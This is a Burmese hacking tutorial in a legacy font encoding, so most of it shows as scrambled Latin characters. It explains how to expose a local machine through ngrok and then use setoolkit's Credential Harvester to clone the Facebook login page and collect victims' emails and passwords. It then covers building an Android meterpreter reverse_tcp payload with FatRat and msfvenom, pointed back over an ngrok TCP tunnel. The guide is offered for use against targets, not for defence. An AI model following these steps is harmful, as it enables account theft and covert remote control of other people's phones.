enter vdkuf&HkygyJ/ 'Davmufqdk em;vnf avmufygjyDaemf/ vufawGYav; vkyfaqmif
Munfh&atmifyg/
 uRefawmfu ngrok http 80 wpfckyJ zGifhvdkufygw,f/ b,fvdk ay:vmvJ
Munfh&atmifyg/

txufygyHktwdkif;ygyJ/ uRefawmfwdkY&JY Session status ae&mrSm

tpdrf;a&mifeJY online vdkY awGY&ygr,f/ Web Interface rSm http://127.0.0.1:4040 vdkY
awGY&rSm jzpfygw,f/ b,fuGefysLwmrSmrqdk localhost udkyJ ajymif;rSmjzpfvdkY
127.0.0.1 u wlaerSm jzpfygw,f/ Localhost atmufrSmawmh Forwarding ESpfydkif;
&Sdygw,f/ http eJY https yg/ prf;oyfMunfhEdkifzdkYtwGuf setoolkit udk erlem oHk;jy
ygr,f/

ngrok udk rydwf&yg/ aemufxyf terminal topfwpfck xyfzGifhjyD;

setoolkit vdkU &dkufvdkufyg/ ('gawGudkawmh a&SUrSm aqG;aEG;jycJhjyD; jzpfygw,f)

uRefawmfu Social Engineering attack udk oHk;rSmjzpfvdkY 1 udk

a&G;vdkufygw,f/
Website Attack Vectors udk oHk;rSmjzpfvdkY 2 udk a&G;vdkufygw,f/

Credential Harvester Attack udk oHk;ygr,f/ 3 yg/

uRefawmfwdkYu Facebook wdkY? Gmail wdkYudk oHk;csifwm qdk&ifawmh 1)

Web Templates xJrSm ygjyD; jzpfygw,f/ tjcm; site awG&JU Login awGudk
vdkcsif&ifawmh manual a&G;cs,f&rSmyg/ uRefawmf manual a&G;cs,fjyxm;ygw,f/

aemufwpfqifhu tm;vHk;odwJhtwdkif;ygyJ/ IP address xnfh&r,fh ae&m

yg/ uRefawmfwdkYtaeeJY owdxm;&rSmu Same Network attack r[kwf/ WAN
attack vkyfrSm qdkwmyg/ WAN attack twGuf IP ae&mrSm localhost IP udkyJ
oHk;&ygr,f/

IP address xnfhoGif;r,fh ae&mrSmawmh 127.0.0.1 udk cke forward

vkyfxm;wJh port eJY wGJxnfh&ygr,f/ ngrok http 80 vdkY forward vkyfcJhwm jzpfvdkY
http 80 udk wGJjyD; 127.0.0.1:80 vdkY xnfhygw,f/ Localhost IP:Port aygh/

'Dtqifhvnf; tm;vHk; odjyD;om;yg/ http & https ESpfckvHk;udk support

ay;wmaMumifhrdkYvdkY https://web.facebook.com udk uRefawmf xnfhvdkufygw,f/
'Dae&mrSm tjcm; Site awGqdk&ifvnf; login url udk ul;xnfhoHk;Edkifygw,f/

site clonevkyfaeaMumif; t0ga&mif eJY jyjyD;awmh note (odoifhwm)

awGudkawmh teDa&mifeJY ajymjyxm;ygw,f/ tjyma&mif pmwef;awG ay:vmjyD
qdk&ifawmh uRefawmfwdkY zefwD;rIonf toifh jzpf oGm;ygjyD/

uRefawmfwdkY&JU attack onf toifh jzpfaejyD jzpfjyD; port 80 rSm run

aeaMumif; azmfjyxm;ovdk &v'fawGudk atmufrSm qufMunfhEdkifaMumif; jyxm;yg
w,f/

yxrqHk; pwifcJhwJh ngrok http 80 zGifhxm;wJh Terminal qD

oGm;&atmifyg/ txufyg yHkrSm Munfh&if Forwarding Link ESpfck jrifawGY&ygr,f/
tJ'DxJurS uRefawmfu https: udk yHkrSmjyxm;wJhtwdkif; a&G;cs,fjyD; Right click ESdyf
copy ,lvdkufygw,f/ jyD;awmh tJonf Link udk uRefawmfwdkY&JU Target xH ay;ydkY
&rSm jzpfygw,f/

uRefawmfwdkY ay;ydkYvdkufwJh Link udk uRefawmfwdkY&JU Target u ESdyfvdkuf

r,f qdk&ifawmh txufygtwdkif; Facebook Login Page udk a&muf&SdoGm;rSmyg/
(ESdyfjyD; 0ifjzpfatmifawmh Social Engineering eJY wdkufwGef;&rSmaygh)/
 uRefawmfwdkY&JU Victim u Link click vdkufwJhtcg ngrok zGifhxm;wJh
Terminal rSm txufygtwdkif; HTTP Request vmjyrSmyg/ Click rsm;&if rsm;ovdk
aygh/

0ifa&mufvdkufwJh mail & password awGudkvnf; setoolkit zGifhxm;wJh

Terminal rSm jrifawGYEdkifrSm jzpfygw,f/ 'gawGaqG;aEG;jyD;om;rdkY 'Davmufqdk
em;vnfjyD vdkY ,lq ygw,fcifAsm/

Port Forwarding for Kali (Method 2)

uRefawmfwdkY yxr aqG;aEG;cJhMuwJh ngrok udkyJ permanent taeeJY
toHk;jyKEdkifr,fh enf;vrf; jzpfygw,f/

yxrqHk;taeeJY Browser uae ngrok.com udk oGm;vdkufyg/ Sign up

For free qdkwmudk ESdyfjyD; Account zGifh&ygr,f/ Sign Up vkyf&wm vG,fuljyD;
Google Sign In vnf; ygwmrdkYvdkY Account zGifhwmawmh tqifajyvdrfhr,fvdkY
arQmfvifhygw,f/ Account zGifhjyD;wJhtcg Mail xJudk Confirm Link ydkYvmygr,f/
Confirm Link udk ESdyfjyD;wmeJY Account Login vdkY &jyD jzpfygw,f/ Account
0ifa&mufjyD;wJhtcg dashboard.ngrok.com/get-started udk a&mufygr,f/
 txufygtwdkif; Connect your account qdkwmudk awGYjrif&rSmjzpfjyD;
tJonfatmufrSm teufa&mif av;axmifhuGufav;xJu command udk copy ,l
vkdufyg/ jyD;&if Terminal udk zGifhjyD; ngrok &SdwJhae&mudk 0ifa&muf&ygr,f/

jyD;&if tJonfrSm uRefawmfwdkY cke ul;vmwJh command code awGudk

xnfhoGif;vdkY &ygjyD/

ul;vmwJh uk'fawG xnfhjyD; Enter vdkufwmeJY Authtoken

(Authentication Token) udk odrf;qnf;jyD; Account eJY csdwfqufjyD; jzpfoGm;ygjyD/
Terminal &JU b,fae&muaerqdk ngrok udk ac:oHk;EdkifwmygyJ/ olY&JU tm;omcsuf
u Account zGifhjyD; csdwfoHk;&if ydkjyD; Stable jzpfwmyg/ 'gaMumifh rdrdwdkY Email awGeJY
Account rzGifhcsifolawGuawmh Account opfav;awGudk oHk;yg/

Android Hacking Over WAN (Example)

'Dcgawmh Fatrat uaeyJ msfvenom udk toHk;jyKjyoGm;ygr,f/

fatrat vdkY ac:vdkufwmeJY FatRat yGifhvmrSmyg/ FatRat udk &,l xnfhoGif;

yHkudk a&SUydkif; tcef;awGrSm aqG;xm;jyD;jyDaemf/
 tpuwnf;u BudKajymxm;wmav; &Sdygw,f/ uRefawmf msfvenom udk
oHk;r,f vdkY/ Menu rSm msfvenom qdkwmudk vdkuf&SmMunfhyg/ 'DyHktwdkif;rSmawmh 1
rSm awGY&ygw,f/ 'gaMumifh uRefawmfu 1 vdkY a&;jyD; Enter vdkufygw,f/

'kwd, menu rSmawmh a&G;cs,fp&m 14 ck awGY&rSmyg/ (wpfcku Back)/

'Dae&mrSm uRefawmfay;xm;wJh acgif;pOfu Android jzpfaewmaMumifh 3 udk
a&G;cs,f vdkufygw,f/ 3 vdkY &dkufjyD; Enter aygh/
 LHOST IP address (or) Hostname owfrSwfay;&rSmyg/

yHkav;jrifwmeJY bmvJqdkwm odr,fxifygw,f/ Terminal aemufwpfck

xyfzGifhjyD; ngrok udk oHk;&ygr,f/ ckcg uRefawmf zGifhcsifwmu tcp port 12345 udk
zGifhcsifwmrdkY yHkrSm jyxm;ovdkyJ ngrok tcp 12345 vdkY&dkufjyD; Enter aygh/

txufygtwdkif; ngrok online jzpfoGm;wJhtxd apmifh&ygr,f/

jyD;&ifawmh Forwarding qdkwJh ae&mu tcp://..........io xd aumfyDul;yg/

ul;vmwJh copy udk LHOST ae&mrSm xnfhoGif;yg/

cke ul;vmwJh .io aemufu *Pef; (yHkxJueJY wlcsifrS wlrSmyg) udk

ul;,ljyD; LPORT ae&mrSm qufxnfh&rSmyg/ uRefawmfh udef;awGu 16042 jzpfvdkY
16042 udkyJ xnfhoGif;vdkufr,faemf/

xGufay:vmr,fh zdkifemrnfudk ay;&rSmyg/

uRefawmfuawmh kmn vdkYyJ emrnfay;xm;vdkufygw,f/

Payload udk uRefawmfu android/meterpreter/reverse_tcp udkyJ

a&G;vdkufygw,f/ 3 aygh/ ngrok rSmvnf; tcp port udk zGifhjycJhwm rSwfrdr,f
xifygw,f/

ckqdk&ifawmh msfvenom eJY payload awGudk zefwD;aejyD jzpfygw,f/

usefwJhtydkif;awGudk Android Hacking ydkif;rSm azmfjyxm;wJh wlaewJhtwGuf razmf
jyawmhygbl;cifAsm/

Facebook Group av;rSmvnf; qufvuf avhvmp&mawG trsm;BuD;

wifay;oGm;OD;rSmjzpfygw,fcifAsm/
qufvuf BudK;pm;ay;oGm;ygOD;rnf
pma&;ol